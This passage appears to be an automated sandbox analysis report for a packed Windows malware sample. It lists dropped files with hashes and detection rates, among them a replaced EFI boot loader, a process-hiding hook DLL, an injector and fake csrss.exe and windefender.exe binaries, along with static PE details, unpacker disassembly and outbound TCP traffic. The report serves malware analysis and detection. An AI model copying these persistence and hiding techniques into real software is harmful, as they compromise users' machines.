                                                            Preview: MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                            C:\EFI\Boot\bootx64.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                            C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:MS-DOS executable
                                                            Category:dropped
                                                            Size (bytes):7680
                                                            Entropy (8bit):4.486535052248291
                                                            Encrypted:false
                                                            SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                            MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                            SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                            SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                            SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:MPEG-4 LOAS
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.2485933233242723
                                                            Encrypted:false
                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4f:BJiRdwfu2SRU4f
                                                            MD5:07615433588EBEE9C0EF1027A51F61CB
                                                            SHA1:47B93A89471B30C4FA9A34AF1181ECB61876E41A
                                                            SHA-256:7E48AD33CB546AA9D70CD832C877BC7F4B4699F61C51AC51B5D55DD5641C0125
                                                            SHA-512:383FFECDB3CF8704B94A4ACBCC922CA416DEA2A36FEED7465B2605E50DDF84F49B11E8D276B99C1E2B4E8BA1179A5496EC2C716CB986BA0758449451B08F0E04
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0xc3a95437, page size 16384, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):786432
                                                            Entropy (8bit):0.2506862368590837
                                                            Encrypted:false
                                                            SSDEEP:384:p3q+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:bSB2nSB2RSjlK/+mLesOj1J2
                                                            MD5:AB4C8C258C77F63C675361C81009DD0B
                                                            SHA1:79387D7F6E3C775DC04DCDB3F3D4826E28F5DBE3
                                                            SHA-256:39E771EA9B9C67F01DBF3BD5C46437EEA59AA6341C430C482D3CEBF1718019D1
                                                            SHA-512:CAC57FB9B745A4ED08C60EEB53C54D4B1D8FC5EB3A2316FD17928454E0E70F095DCB2784322B99A66EE36E6F18DC0B61AC3B71C3E037E66562C6157332E890E3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .T7... ................e.f.3...w........................&..........w...(...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...........................................................................................................................................................................................................................................(...yus..................FX.(...yu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.0776966419796808
                                                            Encrypted:false
                                                            SSDEEP:3:uc/7EvnkyQkl/bJdAtieRihXlall3Vkttlmlnl:3/iLt4bEA3
                                                            MD5:3A0A226FFB9E5BE7BE668ED66AFEAF36
                                                            SHA1:10439E2CF5D2C368A3711FDEFF3164EFA242D19D
                                                            SHA-256:0810F8E71E52D270F45786735674058F991373149449DA076D7A547CAD8BF126
                                                            SHA-512:6ADA4A00E37EBFBCE104FE45F53DB2B3E02782DCA87D1223F1704118F4722DD97896049ED866432E2D3BBB86C37731CAC36A9F2A05238482723FEA0861AB5523
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: -.0......................................3...w...(...yu......w...............w.......w....:O.....w....................FX.(...yu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):101376
                                                            Entropy (8bit):5.951577458824018
                                                            Encrypted:false
                                                            SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                            MD5:09031A062610D77D685C9934318B4170
                                                            SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                            SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                            SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 59%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):288256
                                                            Entropy (8bit):6.31266455792162
                                                            Encrypted:false
                                                            SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                            MD5:D98E33B66343E7C96158444127A117F6
                                                            SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                            SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                            SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 14%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                            C:\Windows\Logs\CBS\CBS.log
                                                            Process:C:\Windows\servicing\TrustedInstaller.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):3080192
                                                            Entropy (8bit):5.316708989576846
                                                            Encrypted:false
                                                            SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqNm:TL1dq
                                                            MD5:E6BE1FA098CCCCD94DF2823F5A056397
                                                            SHA1:B3E04FEADEF53A0331FD041403E5ADE78B8F782C
                                                            SHA-256:A28D3DC5620840981E7FF8CA995A76AB9B38F131B882C46AF066764A996896E3
                                                            SHA-512:7C1D4FCEE4EA4081F9D87AE04B43B0BC8D32931C01435023791C593B36DA9AE0E5B2E7C3750BAFD1FAC863583FAB7F0CC9E32FB7CC5ABC277E5CB9F1018B4C23
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                            C:\Windows\rss\csrss.exe
                                                            Process:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                            Category:dropped
                                                            Size (bytes):3788288
                                                            Entropy (8bit):7.892618389779633
                                                            Encrypted:false
                                                            SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                            MD5:3C3046F640F7825C720849AAA809C963
                                                            SHA1:61AE00EC8041DE7826DECEB176C495AB23392EFB
                                                            SHA-256:3993AA1A1CF9BA37316DB59A6EF67B15EF0F49FCD79CF2420989B9E4A19FFC2A
                                                            SHA-512:64FCA2287D36195C66E11C62292D094ECF7374BCAF931D04AEA5A388F7F67D5588BAE14A79107E61D660E745A17D577D06A69C367408AC48C4A789317D2B2470
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 52%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... ......................................................................................................................................................................UPX0.....0R.............................UPX1......9..@R...9.................@...UPX2..................9.............@...3.95.UPX!.......-..s.....9..&..&"....... Go build ID: "efKxbRE8zJFH9gxB....7pBf/JfqrRU>jpK8uMrff7Rq/6PoX...onZYEm2XfJCsywwk/P5vIQLaJH_zAA....twCM0QU". ...d...........;a.v ...."....D$...$...`..k..&.........|.....f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..<W........L....A....9.}..w._.9.-8.9....5...p........
                                                            C:\Windows\windefender.exe
                                                            Process:C:\Windows\rss\csrss.exe
                                                            File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                            Category:dropped
                                                            Size (bytes):2102272
                                                            Entropy (8bit):7.879347868736008
                                                            Encrypted:false
                                                            SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                            MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                            SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                            SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 29%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 57%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                            \Device\Null
                                                            Process:C:\Windows\SysWOW64\sc.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39
                                                            Entropy (8bit):3.964228182058903
                                                            Encrypted:false
                                                            SSDEEP:3:fxjRCqjv:ZMc
                                                            MD5:2F1A2A9AA9E93E390CC54C36BDB0561B
                                                            SHA1:BC13C3DAE9A3C2A7E45F08F2EF1BB14893078EC7
                                                            SHA-256:706A0C615566BE5CC8D24596CD765A00BE7D5E036CA006DFBD8DE7BC6F7FA719
                                                            SHA-512:4204246AF86876511D1748734BADD3008297EBBFD2E306BC00AED13BD5F5B2A946A0C5A72F3988429A5A4F09B2BFC4E2406D07E87A6F8FDD90309B2C9CCF97FF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: [SC] SetServiceObjectSecurity SUCCESS..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                            Entropy (8bit):7.892618389779633
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:f6oNLRKHUy.exe
                                                            File size:3788288
                                                            MD5:3c3046f640f7825c720849aaa809c963
                                                            SHA1:61ae00ec8041de7826deceb176c495ab23392efb
                                                            SHA256:3993aa1a1cf9ba37316db59a6ef67b15ef0f49fcd79cf2420989b9e4a19ffc2a
                                                            SHA512:64fca2287d36195c66e11c62292d094ecf7374bcaf931d04aea5a388f7f67d5588bae14a79107e61d660e745a17d577d06a69c367408ac48c4a789317d2b2470
                                                            SSDEEP:98304:r1HRHgwXrMeyKVNrb6VryiHiJ+9fCU/3PLg:r1HvrZ9Vlfq1pN3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........$................9......0R. ....@R.......@.......................... .............................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0xcc0820
                                                            Entrypoint Section:UPX1
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                            DLL Characteristics:
                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:1
                                                            File Version Major:6
                                                            File Version Minor:1
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:1
                                                            Import Hash:6ed4f5f04d62b18d96b26d6db7c18840

                                                            Entrypoint Preview

                                                            Instruction
                                                            pushad
                                                            mov esi, 00924015h
                                                            lea edi, dword ptr [esi-00523015h]
                                                            push edi
                                                            or ebp, FFFFFFFFh
                                                            jmp 00007FC1A5063012h
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            mov al, byte ptr [esi]
                                                            inc esi
                                                            mov byte ptr [edi], al
                                                            inc edi
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            jc 00007FC1A5062FEFh
                                                            mov eax, 00000001h
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            adc eax, eax
                                                            add ebx, ebx
                                                            jnc 00007FC1A506300Dh
                                                            jne 00007FC1A506302Ah
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            jc 00007FC1A5063021h
                                                            dec eax
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            adc eax, eax
                                                            jmp 00007FC1A5062FD6h
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            adc ecx, ecx
                                                            jmp 00007FC1A5063054h
                                                            xor ecx, ecx
                                                            sub eax, 03h
                                                            jc 00007FC1A5063013h
                                                            shl eax, 08h
                                                            mov al, byte ptr [esi]
                                                            inc esi
                                                            xor eax, FFFFFFFFh
                                                            je 00007FC1A5063077h
                                                            sar eax, 1
                                                            mov ebp, eax
                                                            jmp 00007FC1A506300Dh
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            jc 00007FC1A5062FCEh
                                                            inc ecx
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            jc 00007FC1A5062FC0h
                                                            add ebx, ebx
                                                            jne 00007FC1A5063009h
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            adc ecx, ecx
                                                            add ebx, ebx
                                                            jnc 00007FC1A5062FF1h
                                                            jne 00007FC1A506300Bh
                                                            mov ebx, dword ptr [esi]
                                                            sub esi, FFFFFFFCh
                                                            adc ebx, ebx
                                                            jnc 00007FC1A5062FE6h
                                                            add ecx, 02h
                                                            cmp ebp, FFFFFB00h
                                                            adc ecx, 02h
                                                            lea edx, dword ptr [eax+eax]

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8c10000x88UPX2
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            UPX00x10000x5230000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            UPX10x5240000x39d0000x39ca00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            UPX20x8c10000x10000x200False0.193359375data1.38215794943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 20, 2021 12:38:52.380979061 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.381028891 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.381218910 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.385061026 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.385092974 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.432085037 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.437221050 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.437266111 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.437572002 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.437587023 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.438894033 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.439246893 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.442462921 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.442719936 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.446187019 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.446233034 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.485929012 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.488615036 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.488686085 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.490700960 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.497334003 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.497370958 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.497396946 CEST49754443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:52.497406960 CEST44349754104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:52.540699959 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.540739059 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.541735888 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.542714119 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.542733908 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.592638016 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.593014002 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.593053102 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.594290972 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.594300985 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.595845938 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.596179962 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.599613905 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.599812984 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.600260973 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.600281000 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.600292921 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.600312948 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.600605965 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.600692987 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.600704908 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.601043940 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.601053953 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.601334095 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.601345062 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.601633072 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.601644993 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.669401884 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.671006918 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.671185017 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.671691895 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.671714067 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:52.672930002 CEST49755443192.168.2.6104.21.79.9
                                                            Oct 20, 2021 12:38:52.672947884 CEST44349755104.21.79.9192.168.2.6
                                                            Oct 20, 2021 12:38:56.651043892 CEST49756443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:56.651084900 CEST44349756104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:56.651170969 CEST49756443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:56.653055906 CEST49756443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:56.653074026 CEST44349756104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:56.692590952 CEST44349756104.21.34.203192.168.2.6
                                                            Oct 20, 2021 12:38:56.692809105 CEST49756443192.168.2.6104.21.34.203
                                                            Oct 20, 2021 12:38:56.692836046 CEST44349756104.21.34.203192.168.2.6
